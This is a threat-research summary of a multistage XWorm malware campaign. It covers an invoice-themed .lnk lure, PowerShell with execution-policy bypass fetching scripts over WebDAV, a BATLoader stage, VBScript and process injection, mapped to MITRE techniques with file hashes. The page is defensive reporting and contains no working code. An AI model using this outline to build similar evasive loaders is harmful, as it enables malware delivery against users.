Threat Research

Sneaky XWorm Uses MultiStaged Attack – Cyble

Securonix

Two sentences: Cyber threat actors use multistage attacks and LOLBins to evade detection while delivering XWorm via WebDAV-enabled infrastructure, with BATLoader and VBScript stages helping drop and execute payloads. The campaign centers on XWorm’s versatility and sale to others, highlighted by the BATLoader chain and WebDAV-based remote scripts. #XWorm #BATLoader #WebDAV #PowerShell #TheDriveHQ #CRIL #Cyble

Keypoints

  • Threat actors frequently use multistage attacks and Living Off the Land Binaries (LOLBins) to deploy malware while evading antivirus detection.
  • The initial infection appears to originate from a .lnk file named “Invoice_7729839_PDF.lnk,” likely distributed via spam emails.
  • Opening the .lnk file triggers a PowerShell process with ExecutionPolicy bypass to fetch a remote script via WebDAV from TheDriveHQ.
  • The remote script downloads a zip containing a loader that injects XWorm into a running process, expanding the attack chain beyond initial access.
  • BATLoader is used to loader the final payload, abusing batch files and obfuscated content, including renamed PowerShell executables and dropped VBScript.
  • VBScript is used to invoke the self-copied BAT file, enabling stealthy execution and avoiding some antivirus detections.
  • XWorm is commodity malware with a broad suite of capabilities (data theft, DDoS, clipper, ransomware, etc.) and is marketed for sale (Version 4.2 for $400 lifetime).

MITRE Techniques

  • [T1566] Spearphishing Attachment – The initial phase of the attack originates from a .lnk file named “Invoice_7729839_PDF.lnk.” Given the filename, it is suspected that the .lnk file may have been distributed to users through spam emails.
  • [T1059.001] PowerShell – Upon executing the .lnk file, it triggers the launch of a PowerShell process with the “ExecutionPolicy Bypass” option and attempts to access a remote PowerShell script named “sh.ps1.”
  • [T1105] Ingress Tool Transfer – The remote script “sh.ps1” initiates the download of a zip file containing a batch script named “sh.bat” to the victim’s machine.
  • [T1059.003] Windows Command Shell – The BATLoader chain relies on .bat/.cmd execution to load and run the final payload.
  • [T1059.005] VBScript – The dropped VBScript has minimal functionality and primarily serves to run the self-copied BAT file.
  • [T1140] Deobfuscate/Decode Files or Information – The BAT file contains obfuscated content, which after deobfuscation reveals a BATLoader technique involving AES decryption and loading assemblies via PowerShell.
  • [T1071] Application Layer Protocol – The PowerShell download and command execution use WebDAV for code execution and payload downloads.
  • [T1055] Process Injection – The loader is designed to inject the XWorm code into a running process.

Indicators of Compromise

  • [SHA256] Lnk file – a19a8e6782f0008c3b10276c764962f6f27b27754d826f8d3679ef15bea122d5
  • [SHA256] BATLoader – 9587ef7ba7dfe745e4c98f724110382b7b53f5f7781d1d3fcfc910abacb3fbb8
  • [SHA256] XWorm malware – b64ed641eafbae33d195864576629ae9e922948b59d9f7e6f4fcaafebcc1b1ca

Read more: https://cyble.com/blog/sneaky-xworm-uses-multistaged-attack/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint